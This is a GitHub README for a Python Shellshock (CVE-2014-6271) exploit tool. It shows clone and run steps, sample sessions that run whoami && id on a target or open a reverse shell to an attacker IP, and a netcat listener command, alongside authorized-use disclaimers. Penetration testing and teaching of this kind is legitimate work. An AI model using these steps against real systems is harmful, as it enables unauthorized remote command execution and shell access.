This Python script exploits the Shellshock vulnerability (CVE-2014-6271) to execute commands remotely or establish a reverse shell on a vulnerable target. 🛠️
This script is intended for educational and authorized penetration testing purposes only. Unauthorized use against systems you do not have explicit permission to test is illegal and unethical. Always obtain proper authorization before conducting any security testing.
- Execute arbitrary commands on a vulnerable system using the Shellshock exploit.
- Establish a reverse shell connection to the attacker's machine.
- A system vulnerable to Shellshock (e.g., an outdated Apache server with CGI enabled).
- Python 3 installed.
curlinstalled on your system.
Clone the repository:
git clone https://github.com/YunchoHang/CVE-2014-6271-SHELLSHOCK.git
cd CVE-2014-6271-SHELLSHOCKRun the script:
python3 AutoShocker.py- Run commands using curl – Allows execution of arbitrary commands on the target machine.
- Get a reverse shell – Establishes a reverse shell connection to your attacker machine.
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 1
Enter the commands you want to execute: whoami && idpython3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 2
Enter your IP (listener): 192.168.1.200
Enter the port for reverse shell (e.g., 4444): 4444Start your listener on your machine:
nc -lvnp 4444- Do not use this tool for unauthorized access.
- Running this on a machine you do not have permission to test is illegal.
- Ensure you have explicit authorization before running security tests.
This project is for educational purposes only. The author is not responsible for any misuse. 📖